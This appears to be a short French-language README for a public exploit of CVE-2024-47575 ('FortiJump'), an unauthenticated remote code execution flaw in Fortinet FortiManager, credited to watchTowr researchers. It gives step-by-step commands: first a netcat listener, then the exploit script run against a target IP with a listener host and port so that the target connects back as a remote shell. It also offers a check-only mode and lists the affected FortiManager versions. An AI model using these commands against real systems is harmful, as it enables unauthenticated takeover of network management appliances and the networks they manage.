Fortijump Exploit CVE 2024 47575
1.0.0
Fortinet FortiManager Exécution de code à distance non authentifié AKA FortiJump CVE-2024-47575
Consultez notre article de blog pour les détails techniques
Pour commencer, établissez votre session ncat :
nc -lvvnp 80
Ensuite, exécutez notre générateur d’artefacts de détection :
python3 CVE-2024-47575.py --target 192.168.1.110 --lhost 192.168.1.53 --lport 80 --action exploit
Pour vérifier la vulnérabilité uniquement, utilisez les options suivantes :
python3 CVE-2024-47575.py --target 192.168.1.110 --action check
FortiManager 7.6.0
FortiManager 7.4.0 through 7.4.4
FortiManager 7.2.0 through 7.2.7
FortiManager 7.0.0 through 7.0.12
FortiManager 6.4.0 through 6.4.14
FortiManager 6.2.0 through 6.2.12
FortiManager Cloud 7.4.1 through 7.4.4
FortiManager Cloud 7.2.1 through 7.2.7
FortiManager Cloud 7.0.1 through 7.0.12
FortiManager Cloud 6.4
Cet exploit a été écrit par Sina Kheirkhah (@SinSinology) de watchTowr (@watchtowrcyber)
Pour les dernières recherches en matière de sécurité, suivez l'équipe watchTowr Labs